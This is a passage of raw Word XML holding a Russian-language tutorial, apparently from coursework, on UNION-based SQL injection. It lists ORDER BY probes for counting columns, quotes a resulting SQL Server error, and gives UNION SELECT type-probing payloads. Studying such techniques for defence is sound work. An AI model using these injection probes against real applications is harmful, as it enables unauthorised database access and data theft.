      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">запросов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Для</w:t>
      </w:r>
      <w:r w:rsidR="00634D28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> того</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> чтобы</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запрос при помощи этого оператора выполнился успешно</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, необходимо, чтобы у </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запроса</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, который мы добавляем посредством </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">было </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>такое же</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>количество</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращаемых параметров </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> соответствующий</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> тип</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Иначе СУБД сгенерирует исключение, которое возможно подскажет вам некоторую необходимую информацию, но чаще всего оно обработается на стороне сервера</w:t>
      </w:r>
      <w:r w:rsidR="002A48B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и вы увидите страницу ошибки.</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Лучшим исходом такой атаки будет </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>страница</w:t>
      </w:r>
      <w:r w:rsidR="001202D9" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, которая</w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> отобразится пользователю некорректно. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6B06" w:rsidRPr="003B32C2" w:rsidRDefault="00B60516"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Для начала необходимо узнать количество аргументов передаваемых в sql-запросе. Злоумышленник может перебором определить это число, но более разумны</w:t>
      </w:r>
      <w:r w:rsidR="002A48B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">м </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">методом будет использование оператора ORDER BY. Такой тип определения считается универсальным. </w:t>
      </w:r>
      <w:r w:rsidR="003E6B06" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При несовпадении количества аргументов </w:t>
      </w:r>
      <w:r w:rsidR="00DE3C27" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">обычно отображается информация об ошибке либо перенаправление на страницу ошибки. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6B06" w:rsidRPr="003B32C2" w:rsidRDefault="003E6B06" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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Для определения количества аргументов в качестве уязвимого строкового параметра </w:t>
      </w:r>
      <w:r w:rsidR="00DE3C27" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">передаются </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>последовательно следующие значения</w:t>
      </w:r>
      <w:r w:rsidR="00DE3C27" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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1</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2</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6B06"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3</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165AA1" w:rsidRPr="003B32C2" w:rsidRDefault="003E6B06" w:rsidP="00347079">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORDER</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BY</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00165AA1" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> //Возникло исключение. Наподобие : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00165AA1" w:rsidRPr="003B32C2" w:rsidRDefault="00165AA1" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>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System.Data.SqlClient.SqlException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: The ORDER BY position number 5 is out of range of the number of items in the select list."</w:t>
      </w:r>
      <w:r w:rsidR="00347079" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00347079" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Или вы были перенаправлены на страницу ошибки.</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BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом, количество аргументов в SQL-запросе равно трем.</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Обычно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н</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>а практике применяетс</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я не линейный, а бинарный поиск, так как количество полей в запросе может быть значительным.</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Напомним, что время подбора количества аргументов при бинарном</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> поиске равно O(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</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где </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 это</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> количество аргументов в запросе. После</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> того, как злоумышленник</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> определ</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ил</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> количеств</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аргументов</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> перебором определяется тип этих аргументов (числовой, строковый или дата). В качестве остальных аргументов</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> обычно передается </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или простое</w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> значение, наподобие пробела, </w:t>
      </w:r>
      <w:r w:rsidR="00E12945">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00E12945" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>имвола</w:t>
      </w:r>
      <w:r w:rsidR="00E12945">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> цифры. Пример</w:t>
      </w:r>
      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавочного запроса</w:t>
      </w:r>
      <w:r w:rsidR="00B60516" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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Default="00E12945"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FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘test’, null, null </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412520" w:rsidRPr="00412520" w:rsidRDefault="00E12945"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412520" w:rsidRPr="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,</w:t>
      </w:r>
      <w:r w:rsidR="00412520" w:rsidRPr="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> null, null </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73001" w:rsidRDefault="00E12945"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FC4D17" w:rsidRPr="00EA1778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00D73001" w:rsidRPr="00EA1778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00412520" w:rsidRPr="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2015-05-30</w:t>
      </w:r>
      <w:r w:rsidR="00412520">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’, null</w:t>
      </w:r>
      <w:r w:rsidR="00347079" w:rsidRPr="00EA1778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, null </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00412520" w:rsidRDefault="00412520" w:rsidP="00412520">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00412520" w:rsidRPr="00412520" w:rsidRDefault="00412520" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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После </w:t>
      </w:r>
      <w:r w:rsidR="002C4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>определения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> количества и типов возвращаемых аргументов, злоумышленник передаёт sql-запрос, извлекающий данные из других таблиц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00034EEB" w:rsidRPr="009F0170" w:rsidRDefault="002A4219" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
